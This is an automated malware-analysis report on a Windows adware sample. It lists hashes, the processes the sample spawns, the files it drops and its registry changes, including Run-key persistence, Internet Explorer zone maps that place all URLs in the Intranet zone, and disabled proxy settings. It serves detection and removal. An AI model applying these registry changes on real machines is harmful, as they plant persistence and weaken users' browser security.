Gen.Variant.Adware.Kazy.264370_10a837ecb7

by malwarelabrobot on December 4th, 2014 in Malware Descriptions.

not-a-virus:HEUR:AdWare.Win32.Hebogo.heur (Kaspersky), Gen:Variant.Adware.Kazy.264370 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 10a837ecb7ad77be14a8f216ba9a27e9
SHA1: 11d9aedc425fa5fb9a06b5b8dc319b6658f585bf
SHA256: 66885e026bb7aa65ff002868645f61ebc563e55ccca86352d8508fa8e84c939e
SSDeep: 24576:KcgCYQ1LGum4sx8Kofd/uV wn0f7fGJDye:pgCh1LGumhuW DzGJye
Size: 865832 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-11-06 21:53:27
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Adware. Delivers advertising content in a manner or context that may be unexpected and unwanted by users. Many adware applications also perform tracking functions. Users may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program or are frustrated by its effects on system performance.

Payload

No specific payload has been found.

Process activity

The PUP creates the following process(es):

GuardConvert.exe:1104
MicroProProc.exe:2020
MicroProProc.exe:596
MicroProCon.exe:1492
%original file name%.exe:452
WinCtrCon.exe:1684
WinCtrProc.exe:600
mscorsvw.exe:172
irsetup.exe:956

The PUP injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process GuardConvert.exe:1104 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\ServerList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\desktop.ini (67 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DFB18F.tmp (0 bytes)

The process MicroProProc.exe:2020 makes changes in the file system.
The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF7AE0.tmp (0 bytes)

The process MicroProProc.exe:596 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\UCg_LPrMLab[1].htm (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrCon[1].exe (52969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe (52969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\FcPimSLab[1].htm (157 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF5D4B.tmp (0 bytes)

The process MicroProCon.exe:1492 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\ServerList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\FormChecktimemicroLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\MicroProProc[1].exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\ProgramUpdateLab[1].htm (21 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe (409017 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DFB189.tmp (0 bytes)

The process %original file name%.exe:452 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (1861 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)

The process WinCtrCon.exe:1684 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrProc[1].exe (418761 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\sTakeList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe (418761 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\FcTimeLab[1].htm (157 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF8DD3.tmp (0 bytes)

The process WinCtrProc.exe:600 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\UCg_LPrMLab[1].htm (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPOD6T6J\FcPimSLab[1].htm (157 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\TransSiteString[1].htm (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\keyword_platinum[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\Uninstall_Ctr[1].exe (89729 bytes)

The process irsetup.exe:956 makes changes in the file system.
The PUP creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe (2712 bytes)
%System%\VB6KO.DLL (2712 bytes)
%System%\MSINET.OCX (2784 bytes)
%Documents and Settings%\%current user%\Application Data\GuardSupport\GuardConvert.exe (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (2784 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.dat (2712 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uniB4.tmp (15807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.xml (930 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe (4102 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\IRIMG1.JPG (2 bytes)

The PUP deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uniB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (0 bytes)

Registry activity

The process GuardConvert.exe:1104 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCR\InetCtls.Inet.1]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\InetCtls.Inet\CurVer]
"(Default)" = "InetCtls.Inet.1"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}]
"(Default)" = "DInetEvents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\InetCtls.Inet.1\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"

[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\FLAGS]
"(Default)" = "2"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1]
"(Default)" = "132497"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\InetCtls.Inet\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\InetCtls.Inet]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}]
"(Default)" = "IInet"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID]
"(Default)" = "InetCtls.Inet.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0\win32]
"(Default)" = "%System%\MSINET.OCX"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control General Property Page Object"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{48E59291-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCR\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\HELPDIR]
"(Default)" = ""

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID]
"(Default)" = "InetCtls.Inet"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 6A 6A 50 87 E1 38 3C 79 74 A0 13 B2 21 24 EC"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control URL Property Page Object"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32]
"(Default)" = "%System%\MSINET.OCX, 1"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\Interface\{48E59292-9880-11CF-9754-00AA00C00908}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The PUP modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The PUP modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The PUP deletes the following registry key(s):

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"

The process MicroProProc.exe:2020 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 3D 67 DB 4E 00 19 0D CA 9D 18 1D 48 AF D4 B1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process MicroProProc.exe:596 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCU\Software\WinCtrView]
"USER_NO" = "3"
"SUBNAME" = "MAIN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\WinCtrView]
"AdFlag" = "Y"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\WinCtrView]
"Upmom" = "Y"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\WinCtrView]
"Intro_No" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\WinCtrView]
"Version" = "1660"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 9D 04 EC CF 03 57 7D F0 16 1B F5 73 BA 0C 9A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the PUP adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -GbRIWgPPC"

The PUP modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The PUP modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the PUP adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -GbRIWgPPC"

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

"AutoConfigURL"

The PUP disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"

"MicroProProc"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"

"MicroProProc"

The process MicroProCon.exe:1492 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCR\InetCtls.Inet.1]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\InetCtls.Inet\CurVer]
"(Default)" = "InetCtls.Inet.1"

[HKCU\Software\MicroLab]
"Upmom" = "N"
"USER_NO" = "3030"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\MicroLab]
"MomDate" = "12/3/2014"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\InetCtls.Inet.1\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1]
"(Default)" = "132497"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\InetCtls.Inet\CLSID]
"(Default)" = "{48E59293-9880-11CF-9754-00AA00C00908}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\InetCtls.Inet]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID]
"(Default)" = "InetCtls.Inet.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control General Property Page Object"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\MicroLab]
"Commit" = "N"

"firstTime" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

